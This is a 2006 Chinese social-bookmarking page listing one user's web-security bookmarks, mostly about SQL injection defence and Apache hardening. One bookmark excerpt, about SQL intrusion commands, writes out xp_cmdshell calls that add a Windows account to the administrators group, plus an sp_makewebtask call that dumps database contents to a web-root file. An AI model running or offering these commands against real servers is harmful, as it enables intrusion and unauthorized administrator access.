365key.com
发现·保存·分享@天天网摘

Q版365key  设为首页 加为收藏 帮助

 首页  网址  添加  我的网摘  我的订阅  最新网摘  收录榜  点击榜  同好  配置  工具箱  标签  兴趣小组 
  IT168 |  华军下载 |  猫扑 |  VeryCD |  CSDN技术 |  DoNews |  9Flash |  中金 |  游侠 |  股票天下 |  游戏公会 |  电子工程 |  白银时代 |  和365Key合作

longrujun的网摘列表 RSS格式输出  365Key邮件订阅,每天可以定期收到邮件通知  使用 POTU 订阅
搜索词: 时间:
分类:     排序:
 
刷新列表 共1页、7项网摘
War on Web 2.0 Terror点击:190
 分类:run2tech; web2.0; websecurity 时间:2006-10-15 1:45:06 longrujun收录 复制到我的网摘
War on Web 2.0 Terror
http://www.readwriteweb.com/archives/war_on_web_20_terror.php
Secure Your Apache With mod_security | HowtoForge - Linux Howtos and Tutorials点击:90
 分类:websecurity; Apache、WebLogic、Tomcat、Resin Web Srv 时间:2006-7-16 16:36:36 longrujun收录 复制到我的网摘
This article shows how to install and configure mod_security. mod_security is an Apache module (for Apache 1 and 2) that provides intrusion detection and prevention for web applications. It aims at shielding web applications from known and unknown attacks, such as SQL injection attacks, cross-site scripting, path traversal attacks, etc.
In the first chapter I will show how to install mod_security on Debian Sarge, Ubuntu 6.06 LTS (Dapper Drake), and on Fedora Core 5, and in the second chapter I will describe how to configure Apache for mod_security which is independent from the distribution you're using.
http://www.howtoforge.com/apache_mod_security
O'Reilly Network -- Data Protection for LAMP Applications点击:83
 分类:websecurity; Apache、WebLogic、Tomcat、Resin Web Srv 时间:2006-7-16 16:31:40 longrujun收录 (还有1人收录) 复制到我的网摘
Data Protection for LAMP Applications
The number of web and enterprise applications based on the LAMP application stack is growing. LAMP applications use Linux or BSD as the operating system, Apache as the web server, MySQL or PostgreSQL as the application database, and PHP, Perl, or Python as the programming language. Other applications use JBoss as the middleware. These layers have the following common attributes:


They are open source and have a large developer and user community behind them.
They are available on multiple hardware platforms and are very well integrated.
An often overlooked aspect in the LAMP application solution is the protection of the application and configuration data. This article examines how to use available open source tools to protect the LAMP application data. The security aspects of the application data and securing the LAMP application servers is beyond the scope of this article. It is also important to test the data recovery scenarios before the actual need arises.

http://www.oreillynet.com/pub/a/databases/2006/07/13/lamp-data-protection.html
Beyond Stored Procedures: Defense-in-Depth Against SQL Injection - Security Articles - IIS Tips Tricks & Resources点击:36
 分类:websecurity; SQLSERVER 2000&2005 时间:2006-7-8 16:39:51 longrujun收录 复制到我的网摘
A few years ago, mentioning the phrase “SQL Injection” to developers or asking to adopt a “defense-in-depth” strategy would probably get you a blank stare for a reply. These days, more people have heard of SQL Injection attacks and are aware of the potential danger these attacks present, but most developers’ knowledge of how to prevent SQL Injection is still inadequate, and when asked how to defend their applications against SQL Injection, they usually reply, “That’s easy, just use stored procedures.” As we will see, using stored procedures is a great first step for your defense strategy, but is not sufficient as the only step. You need to adopt a defense-in-depth strategy.
http://www.iis-resources.com/modules/AMS/article.php?storyid=576
大潘的网誌 Jordan's Blog-施普伦三角形变形来的三维坐标 T-I-E坐标点击:60
 分类:websecurity; IA、QA 时间:2006-7-1 19:20:39 longrujun收录 复制到我的网摘
施普伦三角形和我将其变形后的三维坐标,是读《不论》这本书后的最大的收获。如果将施普伦变形三维坐标用在信息安全的思考上,真是有意思。
将能量理解为我们对于整个体系的控制能力;
将信息理解为我们对于整个体系的检测能力;
将时间理解为我们要花费的时间,特别是调整的时间... ...
  另外一个更有意思的就是,上面三个方面正好可以和PDR三个方面对应上。
http://www.i170.com/user/jordanpan/Article_23442
sql入侵中用到的一些命令[更新:2006.5.23] 点击:47
 分类:websecurity 时间:2006-5-24 16:16:22 longrujun收录 复制到我的网摘
sql入侵中用到的一些命令[更新:2006.5.23]
/*
* 功能:通过xp_cmdshell执行命令
* 本例:添加一个系统帐号,并加入管理员组.
*/
exec master.xp_cmdshell 'net user kgdiwss 123 /add'
exec master.xp_cmdshell 'net localgroup administrators kgdiwss /add'

/*
* 功能:将执行结果写入htm文件
* 注意:文件夹需要有写入的权限.
*/
exec sp_makewebtask
"F:\wwwroot\kgdiwss\test\result.htm", /* 写入路径,也可以是http地址 */
"SELECT * FROM sysdatabases" /* 要执行的sql语句 */
http://blog.csdn.net/kgdiwss/archive/2006/05/23/751018.aspx
PHP注入某大型网站 - GOGO BLOG点击:27
 分类:websecurity 时间:2005-9-13 23:37:33 longrujun收录 复制到我的网摘
http://blog.donews.com/gogoxboy/archive/2005/09/13/552032.aspx
页码: [1 共1页、7项网摘

使用帮助 |  如何保存网摘 |  给365Key提建议 |  媒体报道 |  站长推广须知
Copyright (C) 2004 365Key.com--天天网摘 All Rights Reserved